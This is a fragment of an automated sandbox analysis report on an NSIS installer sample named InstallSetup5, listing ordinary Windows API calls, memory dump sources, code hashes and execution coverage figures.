                                                                                                                                                              • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                                                                                              • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                                                                                                                                              • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                                                                                              • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(?), ref: 00401E56
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                                                                                              • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3808545654-0
                                                                                                                                                              • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                                                                                              • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                                                                                                                                              • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                                                                                              • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                              • String ID: !
                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                              • Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                                                                                              • Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
                                                                                                                                                              • Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                                                                                              • Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                                                                                              • wsprintfW.USER32 ref: 00404E2D
                                                                                                                                                              • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                                                              • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                                                                                              • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                                                                                                                                              • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                                                                                              • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                                                • Part of subcall function 00405ED1: CharNextW.USER32(?,?,0042F270,?,00405F45,0042F270,0042F270, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                                                                                                                                • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                                                                                                • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                                                                                              • lstrlenW.KERNEL32(0042F270,00000000,0042F270,0042F270, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405F87
                                                                                                                                                              • GetFileAttributesW.KERNEL32(0042F270,0042F270,0042F270,0042F270,0042F270,0042F270,00000000,0042F270,0042F270, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                              • String ID: 4#v$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 3248276644-3758603893
                                                                                                                                                              • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                                                                                              • Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
                                                                                                                                                              • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                                                                                              • Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
                                                                                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                                                                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405E48
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 2659869361-3936084776
                                                                                                                                                              • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                              • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                                                                                                                                              • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                              • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040304F
                                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2102729457-0
                                                                                                                                                              • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                                                                                              • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                                                                                                                                              • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                                                                                              • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 0040557F
                                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                                                                                                                                                • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                              • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                                                                                              • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                                                                                                                                              • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                                                                                              • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00403BB5
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 1100898210-3936084776
                                                                                                                                                              • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                                                                                                                              • Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
                                                                                                                                                              • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                                                                                                                              • Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\AppData\Local\Temp,004030EE,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00442800,00442800,80000000,00000003), ref: 00405E78
                                                                                                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Local\Temp,004030EE,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00442800,00442800,80000000,00000003), ref: 00405E88
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00405E72
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharPrevlstrlen
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                              • API String ID: 2709904686-1104044542
                                                                                                                                                              • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                              • Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
                                                                                                                                                              • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                              • Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                              • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                                              • Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
                                                                                                                                                              • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                                              • Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:9.4%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:3.5%
                                                                                                                                                              Signature Coverage:8.5%
                                                                                                                                                              Total number of Nodes:1114
                                                                                                                                                              Total number of Limit Nodes:30
